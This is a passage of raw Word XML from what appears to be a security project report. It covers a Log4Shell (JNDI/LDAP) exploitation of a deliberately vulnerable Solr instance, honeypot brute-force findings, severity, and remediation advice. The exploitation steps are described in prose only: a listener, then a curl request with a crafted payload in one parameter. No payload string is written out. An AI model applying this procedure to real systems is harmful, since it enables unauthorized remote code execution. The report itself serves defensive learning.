            <w:tcW w:type="dxa" w:w="3360"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Start a listener to detect an outbound callback</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5100"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">curl with crafted JNDI/LDAP payload in the 'action' parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Trigger Log4j to resolve a malicious JNDI lookup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5100"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Verified listener output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Confirmed Solr initiated an outbound connection to the attacker-controlled listener</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.3 Result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The listener recorded an incoming connection originating from the Solr container, confirming that the crafted payload was processed by the vulnerable Log4j library and triggered an outbound JNDI/LDAP lookup — proof of successful exploitation.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pacing w:after="220" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9A9A9A"/>
        </w:rPr>
        <w:t xml:space="preserve">[ INSERT SCREENSHOT: Listener screenshot showing 'connect to [IP] from (UNKNOWN)' — proof of Log4Shell trigger ]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.4 Severity &amp; Real-World Impact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CVSS Score: 10.0 (Critical) — the maximum possible severity rating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Unauthenticated, remotely exploitable — no login or user interaction required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Affected a very large share of internet-facing Java applications globally upon disclosure in December 2021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In a real environment, the JNDI/LDAP callback demonstrated here could be extended to load and execute attacker-controlled Java bytecode, resulting in full remote code execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Correlating Honeypot Findings with VAPT Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The honeypot and VAPT exercises were designed to reinforce one another, telling a single, connected story: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honeypot showed that automated attackers actively brute-force weak credentials on internet-facing services (confirmed by the real successful login from 111.229.161.160)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The VAPT exercise showed that a single crafted request against a vulnerable, unpatched service can result in remote code execution — a far more severe outcome than credential guessing alone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Together, these demonstrate the two dominant real-world attack vectors: weak/default credentials, and unpatched software vulnerabilities — both of which remain leading root causes of real breaches today</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. Recommendations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Enforce strong, unique passwords and enable multi-factor authentication on all internet-facing services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Maintain a strict patch-management process — Log4Shell was patched by Apache within days of disclosure, yet unpatched systems remained exploitable for years afterward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Disable or restrict unnecessary exposed services and ports; apply least-privilege network rules (e.g., restrict SSH to known IPs)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Deploy centralized logging and alerting (SIEM) so brute-force and exploitation attempts are detected and investigated promptly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Conduct regular vulnerability scanning and penetration testing to catch known CVEs before attackers do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Use egress filtering / outbound connection monitoring — the Log4Shell exploit in this project was only confirmed because the outbound JNDI callback was observable; blocking unnecessary outbound connections from production servers limits this exact attack path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This project demonstrated a complete, connected view of the modern attack lifecycle — from opportunistic, automated credential-guessing attacks captured on a live internet-facing honeypot, to the exploitation of a critical, real-world vulnerability in a deliberately vulnerable environment. The combination of real attacker telemetry and hands-on exploitation provides a stronger and more credible foundation than either exercise alone, and reflects the day-to-day reasoning used by threat intelligence analysts, SOC analysts, and penetration testers in the industry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Appendix — Reference Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Full command-by-command reproduction steps for this project (honeypot setup, attack simulation, log analysis, and cloud deployment) are provided in the accompanying Command Reference Guide.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2026-07-29T16:43:45.523Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-29T16:43:45.537Z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